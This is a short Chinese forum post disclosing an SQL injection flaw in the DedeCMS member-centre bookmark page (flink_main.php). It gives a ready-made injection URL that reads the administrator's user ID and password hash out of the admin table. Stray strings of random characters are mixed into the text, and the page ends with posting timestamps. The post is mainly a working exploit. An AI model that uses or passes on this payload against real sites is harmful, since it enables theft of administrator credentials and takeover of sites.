DedeCMS会员中心SQL注射漏洞
# D4 J; o4 q- K0 o |! d# E需要magic_quotes_gpc = Off7 i6 Y. T* M3 t4 \. p" z+ a5 m; ~
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码., E: {! B( X4 J0 N
) X4 M( k, ~# A; k! j; zDedeCMS会员中心书签管理SQL注射漏洞
. T0 V# m: y3 X6 l% f( @, ^成功利用该漏洞可获得管理员密码
* ~( r" l# k- S1 G( p9 j 0 Y% n. M" {; V' h9 O, W* @% B3 t
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
: n3 v" C9 C* ^1 m h; f; h' F ~! u
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r+ r( m# A+ Q; S3 a
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59